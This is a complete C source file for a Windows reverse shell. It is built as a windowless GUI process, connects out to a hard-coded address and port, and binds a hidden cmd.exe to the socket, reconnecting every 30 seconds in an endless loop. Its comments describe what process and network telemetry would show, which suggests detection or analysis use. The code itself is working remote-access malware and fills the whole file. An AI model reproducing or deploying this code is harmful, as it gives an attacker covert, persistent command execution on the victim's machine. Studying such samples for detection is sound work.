// Build as a GUI-subsystem image (no console window is allocated at start)
// while still entering through the console CRT startup, so main() below is
// the program's entry function.
#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")
#include <WinSock2.h>
#include <windows.h>
// Link against the Winsock 2 import library.
#pragma comment(lib,"ws2_32")

// Hard-coded remote endpoint that main() connects out to. Both values are
// compiled into the image; the address is a plain string literal.
const CHAR* REMOTE_ADDR = "127.0.0.1";
const DWORD REMOTE_PORT = 9999;
// Size in CHARs of the command-line buffer used by StartShell().
const DWORD MAXSTR = 255;
// Starts <system directory>\cmd.exe with its standard input, output and error
// all set to the connected socket sSock, then blocks until that process exits.
//
// sSock: a connected socket; it is cast to HANDLE and used as the child's
//        stdin, stdout and stderr.
//
// Observable behaviour (what process and network telemetry would show):
//   - a cmd.exe child created with a hidden window (SW_HIDE);
//   - the child's three standard handles all refer to the same socket handle;
//   - the parent is a GUI-subsystem process with an outbound TCP connection.
void StartShell(SOCKET sSock) {
    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    CHAR cmdline[MAXSTR] = { 0 };

    // Start from this process's own startup info, then override the fields below.
    GetStartupInfo(&si);
    si.cb = sizeof(STARTUPINFO);
    // One socket handle serves as stdin, stdout and stderr of the child.
    si.hStdInput = si.hStdOutput = si.hStdError = (HANDLE)sSock;
    // USESTDHANDLES makes the hStd* fields take effect; USESHOWWINDOW makes
    // wShowWindow take effect, and SW_HIDE keeps the child's window hidden.
    si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
    si.wShowWindow = SW_HIDE;

    // Build "<system directory>\cmd.exe". Neither return value is checked.
    GetSystemDirectory(cmdline, MAXSTR);
    strcat_s(cmdline, MAXSTR, "\\cmd.exe");

    // bInheritHandles is TRUE, so inheritable handles of this process are passed
    // to the child. Creation is retried once per second until it succeeds, so a
    // blocked launch shows up as repeated failed process-creation attempts.
    while (!CreateProcess(NULL, cmdline, NULL, NULL, TRUE, NULL, NULL, NULL, &si, &pi)) { Sleep(1000); }
    // Block for the lifetime of the child, then release its process and thread handles.
    WaitForSingleObject(pi.hProcess, INFINITE);
    CloseHandle(pi.hProcess);
    CloseHandle(pi.hThread);
    return;
}
// Entry point: initialises Winsock, then loops forever connecting out to
// REMOTE_ADDR:REMOTE_PORT, handing each connected socket to StartShell(), and
// reconnecting 30 seconds after that session ends. argc and argv are unused.
//
// Returns 0 on every exit path visible here.
//
// The connection is initiated from this host, so it appears in egress (outbound)
// network telemetry rather than as an inbound listener.
int main(int argc, char *argv[]) {
    SOCKADDR_IN sin;
    WSADATA wsd;
    SOCKET sSock;
    int cRet;

    // Request Winsock version 2.2.
    if (WSAStartup(MAKEWORD(2, 2), &wsd) == SOCKET_ERROR) { return 0; }

    while (1) {
        // New TCP/IPv4 socket for each session; exit if it cannot be created.
        if ((sSock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0)) == INVALID_SOCKET) { return 0; }

        // Destination is the hard-coded address and port, port in network byte order.
        sin.sin_family = AF_INET;
        sin.sin_addr.S_un.S_addr = inet_addr(REMOTE_ADDR);
        sin.sin_port = htons(REMOTE_PORT);

        // connect() is retried with no delay until it succeeds, so while the
        // remote endpoint is unreachable this produces a continuous stream of
        // connection attempts to the same address and port.
        do { cRet = connect(sSock, (sockaddr*)&sin, sizeof(sin)); } while (cRet == SOCKET_ERROR);
        // Blocks until the cmd.exe child started by StartShell() exits.
        StartShell(sSock);
        closesocket(sSock);
        // Fixed 30-second pause between sessions before connecting again.
        Sleep(30000);
    }

    // Not reached: the loop above has no break, only the early returns.
    WSACleanup();
    return 0;
}